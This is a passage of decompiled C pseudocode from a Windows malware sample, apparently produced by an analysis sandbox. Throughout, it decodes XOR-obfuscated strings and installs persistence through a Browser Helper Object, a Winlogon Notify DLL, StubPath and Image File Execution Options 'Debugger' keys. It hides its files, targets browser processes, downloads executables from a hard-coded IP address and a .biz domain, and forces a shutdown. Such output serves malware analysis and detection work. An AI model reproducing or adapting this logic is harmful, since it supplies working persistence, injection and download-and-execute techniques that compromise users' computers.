											__eflags = _t569 - 0x41012b;
											if(_t569 >= 0x41012b) {
												break;
											}
											 *_t569 =  *_t569 ^ 0x000000d4;
											__eflags =  *_t569;
											_t569 = (_t569 ^ _t1232) + 1;
										}
										_t570 = "Startup";
										while(1) {
											__eflags = _t570 - 0x410123;
											if(_t570 >= 0x410123) {
												break;
											}
											 *_t570 =  *_t570 ^ 0x000000d4;
											__eflags =  *_t570;
											_t570 = (_t570 ^ _t1232) + 1;
										}
										_t571 = "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32";
										while(1) {
											__eflags = _t571 - 0x41011b;
											if(_t571 >= 0x41011b) {
												break;
											}
											 *_t571 =  *_t571 ^ 0x000000d4;
											__eflags =  *_t571;
											_t571 = (_t571 ^ _t1232) + 1;
										}
										_t572 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}";
										while(1) {
											__eflags = _t572 - 0x4100d0;
											if(_t572 >= 0x4100d0) {
												break;
											}
											 *_t572 =  *_t572 ^ 0x000000d4;
											__eflags =  *_t572;
											_t572 = (_t572 ^ _t1232) + 1;
										}
										_t573 = "ThreadingModel";
										while(1) {
											__eflags = _t573 - 0x41005e;
											if(_t573 >= 0x41005e) {
												break;
											}
											 *_t573 =  *_t573 ^ 0x000000d4;
											__eflags =  *_t573;
											_t573 = (_t573 ^ _t1232) + 1;
										}
										_t574 = "Both";
										while(1) {
											__eflags = _t574 - 0x41004f;
											if(_t574 >= 0x41004f) {
												break;
											}
											 *_t574 =  *_t574 ^ 0x000000d4;
											__eflags =  *_t574;
											_t574 = (_t574 ^ _t1232) + 1;
										}
										_t575 = "http://%s/";
										while(1) {
											__eflags = _t575 - 0x41004a;
											if(_t575 >= 0x41004a) {
												break;
											}
											 *_t575 =  *_t575 ^ 0x000000d4;
											__eflags =  *_t575;
											_t575 = (_t575 ^ _t1232) + 1;
										}
										while(1) {
											__eflags = 0x40fa40 - "http://%s/";
											if(0x40fa40 >= "http://%s/") {
												break;
											}
											 *0x40fa40 =  *0x40fa40 ^ 0x0000004d;
											__eflags =  *0x40fa40;
											 *(_t1312 + 0x40) =  *(_t1312 + 0x40) ^ _t1221;
										}
										while(1) {
											__eflags = 0x40e640 - 0x40fa40;
											if(0x40e640 >= 0x40fa40) {
												break;
											}
											 *0x40e640 =  *0x40e640 ^ 0x0000004d;
											__eflags =  *0x40e640;
											 *(_t1312 + 0x40) =  *(_t1312 + 0x40) ^ _t1221;
										}
										while(1) {
											__eflags = 0x408840 - 0x40e640;
											if(0x408840 >= 0x40e640) {
												break;
											}
											 *0x408840 =  *0x408840 ^ 0x0000004d;
											__eflags =  *0x408840;
											 *(_t1312 + 0x40) =  *(_t1312 + 0x40) ^ _t1221;
										}
										_t580 = CreateFileA(_t1316 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
										 *(_t1316 + 0xa0) = _t580;
										__eflags = _t580;
										if(_t580 != 0) {
											__eflags = _t580 - 0xffffffff;
											if(_t580 != 0xffffffff) {
												SetFilePointer(_t580, 0xfffffff0, 0, 2); // executed
												ReadFile( *(_t1316 + 0xb0), 0x4120e0, 0x10, _t1316 + 0xa0, 0); // executed
												CloseHandle( *(_t1316 + 0xa0)); // executed
												__eflags =  *0x4120e0;
												if( *0x4120e0 == 0) {
													 *0x4120e0 = E004010B2();
													 *(_t1316 + 0x20) = 1;
												}
											}
										}
										_t581 = ".exe";
										while(1) {
											__eflags = _t581 - 0x408822;
											if(_t581 >= 0x408822) {
												break;
											}
											 *_t581 =  *_t581 ^ 0x000000d4;
											_t581 =  &(_t581[1]);
										}
										_t582 = ".dll";
										while(1) {
											__eflags = _t582 - 0x40881d;
											if(__eflags >= 0) {
												break;
											}
											 *_t582 =  *_t582 ^ 0x000000d4;
											__eflags =  *_t582;
											_t582 = (_t582 ^ _t1232) + 1;
										}
										_t583 =  *0x4120e0; // 0x8ff5b2f0
										 *(_t1316 + 0x9c) = _t583;
										 *0x412090 = E00401F84(".exe", _t1316 + 0x9c, __eflags);
										 *0x4120a0 = E00401F84(".exe", _t1316 + 0x9c, __eflags);
										 *0x4120b0 = E00401F84(".exe", _t1316 + 0x9c, __eflags);
										 *0x4120c0 = E00401F84(".dll", _t1316 + 0x9c, __eflags);
										_t1237 = _t1316 + 0x9c;
										_t593 = E00401F84(".dll", _t1237, __eflags);
										_push( *0x4120b0);
										 *0x4120d0 = _t593;
										_t595 = E004010DC(_t1316 + 0x156c);
										_push(_t595); // executed
										L00405E50(); // executed
										__eflags = _t595;
										_t74 = _t595 == 0;
										__eflags = _t74;
										 *(_t1316 + 0x1c) = (_t595 & 0xffffff00 | _t74) & 0x000000ff;
										_t598 = "qnd_b__-12";
										while(1) {
											__eflags = _t598 - 0x408818;
											if(_t598 >= 0x408818) {
												break;
											}
											 *_t598 =  *_t598 ^ 0x000000d4;
											__eflags =  *_t598;
											_t598 = (_t598 ^ _t1237) + 1;
										}
										_t599 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy";
										while(1) {
											__eflags = _t599 - 0x40880d;
											if(_t599 >= 0x40880d) {
												break;
											}
											 *_t599 =  *_t599 ^ 0x000000d4;
											__eflags =  *_t599;
											_t599 = (_t599 ^ _t1237) + 1;
										}
										_t600 = "Default Flags";
										while(1) {
											__eflags = _t600 - 0x4087a5;
											if(_t600 >= 0x4087a5) {
												break;
											}
											 *_t600 =  *_t600 ^ 0x000000d4;
											__eflags =  *_t600;
											_t600 = (_t600 ^ _t1237) + 1;
										}
										 *(_t1316 + 0x34) = 1;
										while(1) {
											_push( *(_t1316 + 0x34));
											wsprintfA(0x408816, "%02X");
											_t602 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
											 *(_t1316 + 0x1c) = _t602;
											_t1316 = _t1316 + 0xc;
											__eflags = _t602;
											if(_t602 == 0) {
												goto L436;
											}
											_t603 = GetLastError();
											__eflags = _t603 - 0xb7;
											if(_t603 != 0xb7) {
												__eflags =  *(_t1316 + 0x34) - 0x11;
												if( *(_t1316 + 0x34) > 0x11) {
													_t1169 = _t1316 + 0x134c;
													_t604 = ExpandEnvironmentStringsA("%ComSpec%", _t1169, 0x104);
													__eflags = _t604;
													if(_t604 != 0) {
														_t990 = CreateFileA(_t1169, 0x80000000, 1, 0, 3, 0, 0); // executed
														 *(_t1316 + 0xa0) = _t990;
														__eflags = _t990 - 0xffffffff;
														_t1276 = _t990;
														if(_t990 != 0xffffffff) {
															GetFileTime(_t1276, _t1316 + 0x84, _t1316 + 0x88, _t1316 + 0x8c);
															CloseHandle( *(_t1316 + 0xa0));
															 *(_t1316 + 0xc) = 1;
														}
													}
													__eflags =  *(_t1316 + 0x1c);
													if( *(_t1316 + 0x1c) != 0) {
														L458:
														_t606 = CreateFileA(_t1316 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
														 *(_t1316 + 0xa0) = _t606;
														__eflags = _t606;
														if(_t606 == 0) {
															L461:
															 *(_t1316 + 0x14) = 0;
															_t1313 = 0;
															__eflags = 0;
															L462:
															CloseHandle(CreateThread(0, 0x1000, E00401038, _t1316 + 0x1570, 0, _t1316 + 0x9c));
															_t611 = 0x408720;
															while(1) {
																__eflags = _t611 - 0x408776;
																if(_t611 >= 0x408776) {
																	break;
																}
																 *_t611 =  *_t611 ^ 0x000000d4;
																_t611 =  &(_t611[1]);
															}
															while(1) {
																__eflags = 0x407b20 - 0x408720;
																if(0x407b20 >= 0x408720) {
																	break;
																}
																 *0x407b20 =  *0x407b20 ^ 0x0000004d;
																__eflags =  *0x407b20;
																 *(_t1313 + 0x40) =  *(_t1313 + 0x40) ^ _t1221;
															}
															__eflags =  *0x412100 - 2;
															if( *0x412100 != 2) {
																L494:
																 *(_t1316 + 0x78) = 0x10;
																_t1170 = _t1316 + 0x1ec;
																_t614 = GetComputerNameA(_t1170, _t1316 + 0x78);
																__eflags = _t614;
																if(_t614 == 0) {
																	L496:
																	_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
																	_push(_t1316 + 0x1bc);
																	L00405E20();
																	L500:
																	wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t1316 + 0x1f4)),  *((char*)(_t1316 + 0x1f1)),  *((char*)(_t1316 + 0x1ee)),  *((char*)(_t1316 + 0x1eb)),  *((char*)(_t1316 + 0x1e8)),  *((char*)(_t1316 + 0x1e5)),  *((char*)(_t1316 + 0x1e2)),  *((char*)(_t1316 + 0x1df)),  *((char*)(_t1316 + 0x1dc)),  *((char*)(_t1316 + 0x1d9)),  *((char*)(_t1316 + 0x1d6)),  *((char*)(_t1316 + 0x1d3)),  *((char*)(_t1316 + 0x1d0)),  *((char*)(_t1316 + 0x1cd)),  *((char*)(_t1316 + 0x1ca)),  *((char*)(_t1316 + 0x1c7)));
																	_t1317 = _t1316 + 0x48;
																	_t633 = 0x407aa0;
																	while(1) {
																		__eflags = _t633 - 0x407ad5;
																		if(_t633 >= 0x407ad5) {
																			break;
																		}
																		 *_t633 =  *_t633 ^ 0x000000d4;
																		_t633 =  &(_t633[1]);
																	}
																	while(1) {
																		__eflags = 0x4072a0 - 0x407aa0;
																		if(0x4072a0 >= 0x407aa0) {
																			break;
																		}
																		 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
																		__eflags =  *0x4072a0;
																		 *(_t1313 + 0x40) =  *(_t1313 + 0x40) ^ _t1221;
																	}
																	_push(0x4122b0);
																	_push(0x407aa0);
																	_t1171 =  &(_t1317[0x1040]);
																	_push(_t1171);
																	L00405E20();
																	_push(0x4072a0);
																	L00405E30();
																	_t636 = RegCreateKeyA(0x80000002, _t1171,  &(_t1317[0x98]));
																	__eflags = _t636;
																	if(_t636 != 0) {
																		L531:
																		_t638 = E004030DE( &(_t1317[0x7b8]));
																		_t1317[0x98] = _t638;
																		__eflags = _t638;
																		if(_t638 == 0) {
																			L551:
																			_t639 = E004010B2();
																			__eflags = _t639;
																			_t1238 = _t639;
																			if(_t639 == 0) {
																				_t1238 = 0x42;
																			}
																			_t1317[0x7b8] = _t1238;
																			_t640 = E004010B2();
																			__eflags = _t640;
																			_t1239 = _t640;
																			if(_t640 == 0) {
																				_t1239 = 0x4d;
																			}
																			_t1317[0x589] = _t1239;
																			_push( *0x4120b0);
																			_push( &(_t1317[0x58e]));
																			L00405E20();
																			_push( &(_t1317[0x1568]));
																			_push( &(_t1317[0x6b2]));
																			L00405E20();
																			_t1287 = _t1317[0x14];
																			_t644 = _t1287 + _t1313;
																			while(1) {
																				__eflags = _t1287 - _t644;
																				if(_t1287 >= _t644) {
																					break;
																				}
																				 *_t1287 =  *_t1287 ^ _t1317[0x589] & 0x000000ff;
																				_t1287 =  &(_t1287[0]);
																				_t644 = _t1317[0x14] + _t1313;
																			}
																			_t1172 =  &(_t1317[0x145c]);
																			_t645 = ExpandEnvironmentStringsA("%AppData%\\", _t1172, 0x104);
																			__eflags = _t645;
																			if(_t645 == 0) {
																				L562:
																				_t1173 =  &(_t1317[0x1458]);
																				_t646 = GetTempPathA(0x104, _t1173);
																				__eflags = _t646;
																				if(_t646 == 0) {
																					L570:
																					E00401029(_t1317[0x14]);
																					_t1174 =  &(_t1317[0xe1c]);
																					_t649 = GetSystemDirectoryA(_t1174, 0x104);
																					_push(0x80);
																					_push( *0x4120c0);
																					_push(0x41103e);
																					_push(_t1174);
																					L00405E30();
																					L00405E30();
																					SetFileAttributesA(_t649, _t649);
																					_t651 = CreateFileA(_t1174, 0x40000000, 0, 0, 2, 0x80, 0);
																					_t1317[0xa0] = _t651;
																					__eflags = _t651;
																					if(_t651 == 0) {
																						L577:
																						_t652 = GetLastError();
																						__eflags = _t652 - 0x20;
																						if(_t652 != 0x20) {
																							_t1175 =  &(_t1317[0xe1c]);
																							_t653 = ExpandEnvironmentStringsA("%AppData%\\", _t1175, 0x104);
																							_push(0x80);
																							_push( *0x4120c0);
																							L00405E30();
																							SetFileAttributesA(_t653, _t1175);
																							_t655 = CreateFileA(_t1175, 0x40000000, 0, 0, 2, 0x80, 0);
																							_t1317[0xa0] = _t655;
																							__eflags = _t655;
																							if(_t655 == 0) {
																								L581:
																								_t656 = GetLastError();
																								__eflags = _t656 - 0x20;
																								if(_t656 == 0x20) {
																									goto L578;
																								}
																								_t827 = GetTempPathA(0x104, _t1175);
																								_push(0x80);
																								_push( *0x4120c0);
																								L00405E30();
																								SetFileAttributesA(_t827, _t1175);
																								_t829 = CreateFileA(_t1175, 0x40000000, 0, 0, 2, 0x80, 0);
																								_t1317[0xa0] = _t829;
																								__eflags = _t829;
																								if(_t829 == 0) {
																									L584:
																									_t830 = GetLastError();
																									__eflags = _t830 - 0x20;
																									if(_t830 == 0x20) {
																										goto L578;
																									}
																									L587:
																									_t1176 =  &(_t1317[0xd0c]);
																									_t661 = ExpandEnvironmentStringsA("%AppData%\\", _t1176, 0x104);
																									_push(0x80);
																									_push( *0x4120d0);
																									L00405E30();
																									SetFileAttributesA(_t661, _t1176);
																									_t663 = CreateFileA(_t1176, 0x40000000, 0, 0, 2, 0x80, 0);
																									_t1317[0xa0] = _t663;
																									__eflags = _t663;
																									_t1240 = _t663;
																									if(_t663 == 0) {
																										L589:
																										_t1177 =  &(_t1317[0xd08]);
																										_t664 = GetTempPathA(0x104, _t1177);
																										_push(0x80);
																										_push( *0x4120d0);
																										L00405E30();
																										SetFileAttributesA(_t664, _t1177);
																										_t666 = CreateFileA(_t1177, 0x40000000, 0, 0, 2, 0x80, 0);
																										_t1317[0xa0] = _t666;
																										__eflags = _t666;
																										_t1240 = _t666;
																										if(_t666 == 0) {
																											L592:
																											_t1317[0xd08] = 0;
																											L593:
																											__eflags = _t1317[0xd08];
																											if(_t1317[0xd08] != 0) {
																												CreateFileA( &(_t1317[0xd20]), 0x80000000, 1, 0, 3, 0, 0);
																											}
																											_t1178 =  &(_t1317[0xac]);
																											GetSystemDirectoryA(_t1178, 0x104);
																											_push(0x41103e);
																											_push(_t1178);
																											L00405E30();
																											E004012C2(_t1178);
																											ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t1178, 0x104);
																											E004012C2(_t1178);
																											ExpandEnvironmentStringsA("%AppData%\\", _t1178, 0x104);
																											E004012C2(_t1178);
																											_t676 = 0x407220;
																											while(1) {
																												__eflags = _t676 - 0x40724d;
																												if(_t676 >= 0x40724d) {
																													break;
																												}
																												 *_t676 =  *_t676 ^ 0x000000d4;
																												_t676 =  &(_t676[1]);
																											}
																											_t677 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t1317[0x98]));
																											__eflags = _t677;
																											if(_t677 == 0) {
																												L600:
																												__eflags = _t1317[0x2c];
																												if(_t1317[0x2c] == 0) {
																													_t1191 =  &(_t1317[0x1568]);
																													_t817 = E00401251(_t1317[0x98]);
																													_push(_t1191);
																													L00405E40();
																													_t818 = _t817 + 1;
																													__eflags = _t818;
																													RegSetValueExA(_t1317[0xac],  *0x4120b0, 0, 1, _t1191, _t818);
																												}
																												RegDeleteValueA(_t1317[0x9c], "winrnt.exe");
																												RegCloseKey(_t1317[0x98]);
																												L603:
																												__eflags =  *0x412100 - 2;
																												if( *0x412100 != 2) {
																													L643:
																													CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t1317[0x9c])));
																													_t682 = 0x407000;
																													while(1) {
																														__eflags = _t682 - 0x407060;
																														if(_t682 >= 0x407060) {
																															break;
																														}
																														 *_t682 =  *_t682 ^ 0x000000d4;
																														_t682 =  &(_t682[1]);
																													}
																													_t1317[0x30] = 0;
																													while(1) {
																														E004011CF(0x80000002, 0x407000);
																														__eflags = _t1317[0x30] - 9;
																														if(_t1317[0x30] <= 9) {
																															goto L682;
																														}
																														L648:
																														_t1317[0x58] = 0;
																														_t1317[0x5c] = 0;
																														_t741 = E004025C3();
																														__eflags = _t741;
																														if(_t741 != 0) {
																															L679:
																															 *_t1317 = 0;
																															L683:
																															_t1317[0x34] = 0x3b;
																															do {
																																__eflags = _t1317[0xd08];
																																if(_t1317[0xd08] != 0) {
																																	_push(0);
																																	_push("opera.exe");
																																	_push("seamonkey.exe");
																																	_push("mozilla.exe");
																																	_push("firefox.exe");
																																	_push("iexplore.exe");
																																	_push("explorer.exe");
																																	E0040318D( &(_t1317[0xd24]));
																																	_t1317 =  &(_t1317[0x20]);
																																}
																																__eflags = _t1317[0x28];
																																if(_t1317[0x28] != 0) {
																																	_t1182 =  &(_t1317[0xf2c]);
																																	SetFileAttributesA(_t1182, 0x21);
																																	_t718 = RegCreateKeyA(0x80000002,  &(_t1317[0x103c]),  &(_t1317[0x98]));
																																	__eflags = _t718;
																																	if(_t718 == 0) {
																																		E00401251(_t1317[0x98]);
																																		_t1317[0x9c] = 1;
																																		_t722 = RegSetValueExA(_t1317[0xac], "IsInstalled", 0, 4,  &(_t1317[0xa0]), 4);
																																		_push(_t1182);
																																		L00405E40();
																																		_t723 = _t722 + 1;
																																		__eflags = _t723;
																																		RegSetValueExA(_t1317[0xac], "StubPath", 0, 1, _t1182, _t723);
																																		RegCloseKey(_t1317[0x98]);
																																	}
																																}
																																__eflags = _t1317[0x2c];
																																_t1288 =  &(_t1317[0x98]);
																																if(_t1317[0x2c] == 0) {
																																	_t685 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t1288);
																																	__eflags = _t685;
																																	if(_t685 == 0) {
																																		L694:
																																		_t1179 =  &(_t1317[0x1568]);
																																		_push(_t1179);
																																		L00405E40();
																																		_t686 = _t685 + 1;
																																		__eflags = _t686;
																																		_push(_t686);
																																		_push(_t1179);
																																		_push(1);
																																		_push(0);
																																		_push( *0x4120b0);
																																		L695:
																																		RegSetValueExA(_t1317[0xac], ??, ??, ??, ??, ??);
																																		RegCloseKey(_t1317[0x98]);
																																		L696:
																																		__eflags = _t1317[0x24];
																																		if(_t1317[0x24] == 0) {
																																			goto L706;
																																		}
																																		_t1180 =  &(_t1317[0x9c]);
																																		_t693 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1180, 0);
																																		__eflags = _t693;
																																		if(_t693 == 0) {
																																			L699:
																																			RegSetValueExA(_t1317[0xac], "SubshellState", 0, 3,  &(_t1317[0x7bc]), 0x22a);
																																			RegCloseKey(_t1317[0x98]);
																																			L700:
																																			_t1181 =  &(_t1317[0xe1c]);
																																			SetFileAttributesA(_t1181, 0x21);
																																			__eflags =  *0x412100 - 2;
																																			_t1291 =  &(_t1317[0x98]);
																																			if( *0x412100 != 2) {
																																				_t698 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t1291);
																																				__eflags = _t698;
																																				if(_t698 != 0) {
																																					goto L706;
																																				}
																																				_push(_t1181);
																																				L00405E40();
																																				RegSetValueExA(_t1317[0xac], 0, 0, 1, _t1181, _t698 + 1);
																																				RegSetValueExA(_t1317[0xac], "ThreadingModel", 0, 1, "Both", 5);
																																				RegCloseKey(_t1317[0x98]);
																																				_t703 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t1291);
																																				__eflags = _t703;
																																				if(_t703 != 0) {
																																					goto L706;
																																				}
																																				L705:
																																				RegCloseKey(_t1317[0x98]);
																																				goto L706;
																																			}
																																			_t705 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t1291);
																																			__eflags = _t705;
																																			if(_t705 != 0) {
																																				goto L706;
																																			}
																																			_t707 = E00401251(_t1317[0x98]);
																																			_push(_t1181);
																																			L00405E40();
																																			RegSetValueExA(_t1317[0xac], "DLLName", 0, 1, _t1181, _t707 + 1);
																																			RegSetValueExA(_t1317[0xac], "Startup", 0, 1, "Startup", 8);
																																			goto L705;
																																		}
																																		_t711 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1180, 0);
																																		__eflags = _t711;
																																		if(_t711 != 0) {
																																			goto L700;
																																		}
																																		goto L699;
																																	}
																																	_t685 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t1288);
																																	__eflags = _t685;
																																	if(_t685 != 0) {
																																		goto L696;
																																	}
																																	goto L694;
																																}
																																_t1183 =  &(_t1317[0x123c]);
																																SetFileAttributesA(_t1183, 0x21);
																																_t692 = RegCreateKeyA(0x80000002, 0x408720, _t1288);
																																__eflags = _t692;
																																if(_t692 != 0) {
																																	goto L696;
																																}
																																_t713 = E00401251(_t1317[0x98]);
																																_push(_t1183);
																																L00405E40();
																																_push(_t713 + 1);
																																_push(_t1183);
																																_push(1);
																																_push(0);
																																_push("Debugger");
																																goto L695;
																																L706:
																																SetFileAttributesA( &(_t1317[0x156c]), 0x21);
																																Sleep(0x3e8);
																																_t476 =  &(_t1317[0x34]);
																																 *_t476 = _t1317[0x34] - 1;
																																__eflags =  *_t476;
																															} while ( *_t476 >= 0);
																															L707:
																															_t729 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t1317[0x48]), 0);
																															__eflags = _t729;
																															if(_t729 != 0) {
																																do {
																																	E004011CF(0x80000002, 0x407000);
																																	__eflags = _t1317[0x30] - 9;
																																	if(_t1317[0x30] <= 9) {
																																		goto L682;
																																	}
																																	goto L648;
																																} while (_t729 != 0);
																															}
																															_t1317[0x40] = 4;
																															_t1187 =  &(_t1317[0x40]);
																															_t731 = RegQueryValueExA(_t1317[0x58], "g00d d0gg", 0, 0, _t1187,  &(_t1317[0x40]));
																															__eflags = _t731;
																															if(_t731 == 0) {
																																_t734 = _t1317[0x3c] - 1;
																																__eflags = _t734;
																																_t1317[0x3c] = _t734;
																																if(_t734 == 0) {
																																	RegDeleteValueA(_t1317[0x48], "g00d d0gg");
																																	Sleep(0x1388);
																																	__eflags =  *0x412100 - 2;
																																	if( *0x412100 != 2) {
																																		ExitWindowsEx(6, 0);
																																	} else {
																																		RtlAdjustPrivilege(0x13, 1, 0,  &(_t1317[0x3b]));
																																		 *0x412240(1);
																																	}
																																} else {
																																	RegSetValueExA(_t1317[0x58], "g00d d0gg", 0, 4, _t1187, 4);
																																}
																															}
																															RegCloseKey(_t1317[0x44]);
																															continue;
																														}
																														_t743 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t1317[0x70]), 0);
																														__eflags = _t743;
																														if(_t743 != 0) {
																															__eflags =  *_t1317;
																															if( *_t1317 == 0) {
																																goto L683;
																															}
																															L681:
																															_t1317[0x30] = 0;
																															goto L683;
																														}
																														_t1314 =  &(_t1317[0x64]);
																														GetSystemTimeAsFileTime(_t1314);
																														_t1317[0x60] = 8;
																														_t1279 =  &(_t1317[0x5c]);
																														_t745 = RegQueryValueExA(_t1317[0x80], "ConnPred", 0,  &(_t1317[0x5c]), _t1279,  &(_t1317[0x60]));
																														__eflags = _t745;
																														if(_t745 != 0) {
																															L652:
																															__eflags = E004014D8(_t1314, 0x412070) - 0x4af;
																															if(__eflags <= 0) {
																																L663:
																																__eflags =  *0x412080;
																																if( *0x412080 == 0) {
																																	L666:
																																	_t1317[0x60] = 8;
																																	__eflags = RegQueryValueExA(_t1317[0x80], "UseExtProfile", 0,  &(_t1317[0x5c]), _t1279,  &(_t1317[0x60]));
																																	if(__eflags != 0) {
																																		L668:
																																		_t750 = E00402427(__eflags);
																																		__eflags = _t750;
																																		if(_t750 != 0) {
																																			L678:
																																			RegCloseKey(_t1317[0x6c]);
																																			goto L679;
																																		}
																																		_push(1);
																																		_push(0);
																																		_t753 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																																		__eflags = _t753;
																																		if(_t753 == 0) {
																																			L671:
																																			_t1317[0x60] = 8;
																																			_t1185 =  &(_t1317[0x4c]);
																																			_t755 = RegQueryValueExA(_t1317[0x80], "UseDflProfile", 0,  &(_t1317[0x5c]),  &(_t1317[0x4c]),  &(_t1317[0x60]));
																																			__eflags = _t755;
																																			if(_t755 != 0) {
																																				_t764 = _t1317[0x58] + 0x1162f100;
																																				__eflags = _t764;
																																				asm("adc edx, 0xffffff9b");
																																				_t1317[0x48] = _t764;
																																				_t1317[0x4c] = _t1317[0x5c];
																																			}
																																			__eflags = E004014D8( &(_t1317[0x64]), _t1185) - 0x152ab;
																																			if(__eflags <= 0) {
																																				goto L678;
																																			}
																																			_t758 = E00402427(__eflags);
																																			__eflags = _t758;
																																			if(_t758 != 0) {
																																				goto L678;
																																			}
																																			_push(3);
																																			_push(0);
																																			_t760 = E0040211B("tombul.gif", 0);
																																			__eflags = _t760;
																																			if(_t760 == 0) {
																																				goto L678;
																																			}
																																			_push(8);
																																			_push(_t1314);
																																			_push(0xb);
																																			_push(0);
																																			_push("UseDflProfile");
																																			L677:
																																			RegSetValueExA(_t1317[0x80], ??, ??, ??, ??, ??);
																																			RegCloseKey(_t1317[0x6c]);
																																			 *_t1317 = 1;
																																			goto L681;
																																		}
																																		_t1317[0x58] = _t1317[0x64].dwLowDateTime;
																																		_t1317[0x5c] = _t1317[0x68];
																																		_push(8);
																																		_push(_t1314);
																																		_push(0xb);
																																		_push(0);
																																		_push("UseExtProfile");
																																		goto L677;
																																	}
																																	__eflags = E004014D8( &(_t1317[0x64]),  &(_t1317[0x58])) - 0x152ab;
																																	if(__eflags <= 0) {
																																		goto L671;
																																	}
																																	goto L668;
																																}
																																_push(3);
																																_push(0);
																																_t769 = E0040211B("grazie.gif", 0);
																																__eflags = _t769;
																																if(_t769 == 0) {
																																	goto L666;
																																}
																																_t1317[0x58] = _t1317[0x64].dwLowDateTime;
																																_t1317[0x5c] = _t1317[0x68];
																																_push(8);
																																_push(_t1314);
																																_push(0xb);
																																_push(0);
																																_push("ConnPred");
																																goto L677;
																															}
																															_t771 = E00402427(__eflags);
																															__eflags = _t771;
																															if(_t771 != 0) {
																																goto L678;
																															}
																															_t773 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																															_t1290 = 0;
																															__eflags = _t773;
																															_t1186 = _t773;
																															if(_t773 != 0) {
																																_t778 = E00401E00(_t773,  &(_t1317[0x56]), 2);
																																__eflags = _t778 - 2;
																																if(_t778 == 2) {
																																	_t1290 = 1;
																																}
																															}
																															E00401F59(_t1186);
																															__eflags = _t1290;
																															if(_t1290 == 0) {
																																 *0x412080 = 0;
																																goto L663;
																															}
																															 *0x412070 = _t1317[0x64];
																															_t777 = 0;
																															__eflags = _t1317[0x52] - 0x49;
																															 *0x412074 = _t1317[0x68];
																															if(_t1317[0x52] == 0x49) {
																																__eflags = _t1317[0x53] - 0x54;
																																if(_t1317[0x53] == 0x54) {
																																	_t777 = 1;
																																}
																															}
																															 *0x412080 = _t777;
																															goto L663;
																														}
																														_t780 = E004014D8(_t1314, _t1279);
																														__eflags = _t780 - 0x152ab;
																														if(_t780 <= 0x152ab) {
																															goto L666;
																														}
																														goto L652;
																														L682:
																														_t439 =  &(_t1317[0x30]);
																														 *_t439 =  &(_t1317[0x30][1]);
																														__eflags =  *_t439;
																														goto L683;
																													}
																												}
																												_t781 = 0x4071e0;
																												while(1) {
																													__eflags = _t781 - 0x407214;
																													if(_t781 >= 0x407214) {
																														break;
																													}
																													 *_t781 =  *_t781 ^ 0x000000d4;
																													_t781 =  &(_t781[1]);
																												}
																												_t782 = 0x4071c3;
																												while(1) {
																													__eflags = _t782 - 0x4071cf;
																													if(_t782 >= 0x4071cf) {
																														break;
																													}
																													 *_t782 =  *_t782 ^ 0x000000d4;
																													_t782 =  &(_t782[1]);
																												}
																												_t1292 =  &(_t1317[0x98]);
																												_t783 = RegCreateKeyA(0x80000002, 0x4071e0, _t1292);
																												__eflags = _t783;
																												if(_t783 == 0) {
																													RegSetValueExA(_t1317[0xac], 0x4071c3, 0, 4,  &(_t1317[0xa0]), 4);
																													RegCloseKey(_t1317[0x98]);
																												}
																												_t784 = 0x4071a0;
																												while(1) {
																													__eflags = _t784 - 0x4071c2;
																													if(_t784 >= 0x4071c2) {
																														break;
																													}
																													 *_t784 =  *_t784 ^ 0x000000d4;
																													_t784 =  &(_t784[1]);
																												}
																												_t785 = 0x407177;
																												while(1) {
																													__eflags = _t785 - 0x407188;
																													if(_t785 >= 0x407188) {
																														break;
																													}
																													 *_t785 =  *_t785 ^ 0x000000d4;
																													_t785 =  &(_t785[1]);
																												}
																												_t786 = 0x407160;
																												while(1) {
																													__eflags = _t786 - 0x407176;
																													if(_t786 >= 0x407176) {
																														break;
																													}
																													 *_t786 =  *_t786 ^ 0x000000d4;
																													_t786 =  &(_t786[1]);
																												}
																												_t787 = 0x40714a;
																												while(1) {
																													__eflags = _t787 - 0x40715f;
																													if(_t787 >= 0x40715f) {
																														break;
																													}
																													 *_t787 =  *_t787 ^ 0x000000d4;
																													_t787 =  &(_t787[1]);
																												}
																												_t788 = 0x407135;
																												while(1) {
																													__eflags = _t788 - 0x407149;
																													if(_t788 >= 0x407149) {
																														break;
																													}
																													 *_t788 =  *_t788 ^ 0x000000d4;
																													_t788 =  &(_t788[1]);
																												}
